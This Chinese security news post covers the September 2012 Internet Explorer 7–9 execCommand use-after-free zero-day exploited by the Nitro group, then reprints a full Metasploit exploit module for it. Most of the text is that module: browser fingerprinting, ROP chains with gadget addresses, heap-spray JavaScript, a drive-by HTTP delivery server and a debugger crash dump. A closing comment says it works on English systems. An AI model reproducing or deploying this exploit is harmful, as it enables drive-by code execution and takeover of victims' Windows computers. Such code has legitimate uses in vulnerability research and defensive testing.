IE7/8/9 零日漏洞(附Exploit)
- 发表于
- Vulndb
Metasploit制造商HD Moore建议用户停用IE7、IE8和IE9,直到微软修复关键漏洞。
安全专家称,攻击者正在利用微软IE浏览器中的一个“零日”漏洞来攻击访问恶意或被感染的网站的Windows电脑。
微软称正在调查该漏洞的报告,但还没有确定修复该漏洞的时间表。
安全公司Rapid 7表示,IE7、IE8和IE9中未修复的漏洞可以在Windows XP、Vista和Windows 7中被利用,Rapid 7也负责维护开源Metasploit渗透测试工具包。
Rapid 7要求IE用户暂停使用该浏览器,转而使用其他浏览器。
Rapid 7公司在其Metasploit博客中写道:“由于微软目前还没有发布这个漏洞的补丁,我们强烈建议用户在安全更新发布之前,改用其他浏览器,例如谷歌的Chrome或者Mozilla的Firefox。”
Metasploit贡献者Eric Romang在监测受“Nitro”黑客团伙操作的服务器时,偶然发现了这个IE漏洞,该黑客团伙上个月利用Oracle的Java中的零日漏洞来感染电脑。
Nitro团伙于2011年7月被首次发现,赛门铁克公司表示,该团伙瞄准了数目不详的公司,感染了至少48家企业,其中许多是在化工、高级材料和国防工业行业的公司。
在今年8月的攻击者,该攻击团伙利用了Java中未打补丁的漏洞,迫使Oracle发出紧急安全更新。苹果公司也发布了Java 6的补丁来保护其用户,其OS X Snow Leopard和OS Lion中使用了Java 6.
Windows 8操作系统中的IE 10浏览器是否存在最新的漏洞,或者说攻击者的攻击是否能有效地针对该版本浏览器,我们仍然不清楚。
Rapid 7首先去昂兼Metasploit创造者HD Moore表示,他和他的团队尚未测试Windows 8中的IE 10,不过他们计划尽快进行这个测试。Moore表示:“但我猜它应该可以被利用。”
Moore并不清楚Nitro团伙的责任方,他表示该团伙并不一定来自某个特定国家,还存在其他可能性,“多个团体可能在共享这些零日漏洞,互相传递。”
Moore表示,也有可能托管IE利用代码的Web服务器只是一个倾销地,他指出,监控流氓系统的研究人员发现系统中存储恶意软件。
“也许IE利用漏洞放在该服务器中,因为攻击者已经利用完了,”Moore推测,“隐藏踪迹的方法之一就是,当你做完想做的事情后,让这个利用漏洞广泛分布。”
-----------------------------------
从几个公开的blog里还原到的
详细请点击http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
a
最新IE远程代码执行漏洞Exploit
微软已于今日发布确认公告:
Sep 17th, 2012 - Microsoft releases advisory 2757760:
http://technet.microsoft.com/en-us/security/advisory/2757760
参考资料
IE execCommand fuction Use after free Vulnerability 0day
http://www.hackqing.com/index.asp?FoxNews=605.html
Exploit(仅用于漏洞验证测试,禁止非法使用)
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name=> HttpClients::IE,
:ua_minver=> "7.0",
:ua_maxver=> "9.0",
:javascript => true,
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
'Description'=> %q{
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When
rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,
but the same memory is reused again later in the CMshtmlEd::Exec() function, leading
to a use-after-free condition.Please note that this vulnerability has
been exploited in the wild since Sep 14 2012, and there is currently no official
patch for it.
},
'License'=> MSF_LICENSE,
'Author' =>
[
'unknown', # Some secret ninja
'eromang', # First public discovery
'binjo',
'sinn3r',# Metasploit
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'OSVDB', '85532' ],
[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/'],
[ 'URL', 'http://metasploit.com' ]
],
'Payload'=>
{
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'DefaultOptions'=>
{
'ExitFunction' => "none",
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets'=>
[
[ 'Automatic', {} ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 7 on Windows Vista',{ 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
[ 'IE 8 on Windows Vista',{ 'Rop' => :jre,'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 8 on Windows 7',{ 'Rop' => :jre,'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 9 on Windows 7',{ 'Rop' => :jre,'Offset' => '0x5fc', 'Random' => true } ]
],
'Privileged' => false,
'DisclosureDate' => "Sep 14 2012",# When it was spotted in the wild by eromang
'DefaultTarget'=> 0))
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[1]#IE 7 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[2]#IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[3]#IE 7 on Windows Vista
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
return targets[4]#IE 8 on Windows Vista
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
return targets[5]#IE 8 on Windows 7
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
return targets[6]#IE 9 on Windows 7
else
return nil
end
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
exec_size = code.length
stack_pivot = [
0x77c4e393, # RETN
0x77c4e392, # POP EAX # RETN
0x77c15ed5, # XCHG EAX, ESP # RETN
].pack("V*")
rop =
[
0x77C21891,# POP ESI # RETN
0x0c0c0c04,# ESI
0x77c4e392,# POP EAX # RETN
0x77c11120,# <- *&VirtualProtect()
0x77c2e493,# MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c,# XCHG EAX,ESI # ADD [EAX], AL # RETN
0x77c4ec00,# POP EBP # RETN
0x77c35459,# ptr to 'push esp #ret'
0x77c47705,# POP EBX # RETN
exec_size, # EBX
0x77c3ea01,# POP ECX # RETN
0x77c5d000,# W pointer (lpOldProtect) (-> ecx)
0x77c46100,# POP EDI # RETN
0x77c46101,# ROP NOP (-> edi)
0x77c4d680,# POP EDX # RETN
0x00000040,# newProtect (0x40) (-> edx)
0x77c4e392,# POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9,# PUSHAD # RETN
].pack("V*")
when :jre
print_status("Using JRE ROP")
exec_size = 0xffffffff - code.length + 1
if t['Random']
stack_pivot = [
0x0c0c0c0c, # 0c0c0c08
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05# XCHG EAX, ESP # RET
].pack("V*")
else
stack_pivot = [
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05# XCHG EAX, ESP # RET
].pack("V*")
end
rop =
[
0x7c37653d,# POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
exec_size, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98,# RETN (ROP NOP)
0x7c3415a2,# JMP [EAX]
0xffffffff,
0x7c376402,# skip 4 bytes
0x7c351e05,# NEG EAX # RETN
0x7c345255,# INC EBX # FPATAN # RETN
0x7c352174,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87,# POP EDX # RETN
0xffffffc0,# Value to negate, will become 0x00000040
0x7c351eb1,# NEG EDX # RETN
0x7c34d201,# POP ECX # RETN
0x7c38b001,# &Writable location
0x7c347f97,# POP EAX # RETN
0x7c37a151,# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81,# PUSHAD # ADD AL,0EF # RETN
0x7c345c30,# ptr to 'push esp #ret '
].pack("V*")
end
code = stack_pivot + rop + code
return code
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_code, js_nops)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset_length = #{t['Offset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def get_spray(t, js_code, js_nops)
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var overflow = nops.substring(0, 10);
JS
end
def load_html1(cli, my_target)
p = get_payload(my_target, cli)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
if my_target['Random']
js = get_random_spray(my_target, js_code, js_r_nops)
else
js = get_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
html = <<-EOS
EOS
return html
end
def load_html2
html = %Q|
a
|
return html
end
def this_resource
r = get_resource
return ( r == '/') ? '' : r
end
def on_request_uri(cli, request)
print_status request.headers['User-Agent']
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, sending a 404: #{agent.to_s}")
send_not_found(cli)
return
end
vprint_status("Requesting: #{request.uri}")
if request.uri =~ /#{@html2_name}/
print_status("Loading #{@html2_name}")
html = load_html2
elsif request.uri =~ /#{@html1_name}/
print_status("Loading #{@html1_name}")
html = load_html1(cli, my_target)
elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
print_status("Redirecting to #{@html1_name}")
send_redirect(cli, "#{this_resource}/#{@html1_name}")
return
else
send_not_found(cli)
return
end
html = html.gsub(/^\t\t/, '')
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
super
end
end
=begin
0:008> r
eax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08
eip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0 nv up ei pl nz na pe nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07mov eax,dword ptr [edi]ds:0023:0c0c0c08=????????
0:008> u
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07mov eax,dword ptr [edi]
637d4650 57pushedi
637d4651 ff5008calldword ptr [eax+8]
0:008> k
ChildEBP RetAddr
020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134
020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6
020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91
020bc298 638ee2a9 mshtml!CDocument::Exec+0x24
020bc2c0 638b167b mshtml!CBase::execCommand+0x50
020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93
020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1
020bc410 63643832 mshtml!CBase::InvokeEx+0x25
020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b
020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1
020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20
020bc520 633a6d37 mshtml!PlainInvokeEx+0xea
020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98
020bc690 633a77ff jscript!VAR::InvokeByName+0x135
020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989
=end
编辑评论:
据一些朋友测试,英文版能成功运行,中文版有一些问题,最后说下,0day虽好,切勿拿来做坏事哦~
随着此Oday的公布,估计不少电脑又要成为肉鸡~
原文连接:IE7/8/9 零日漏洞(附Exploit)
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
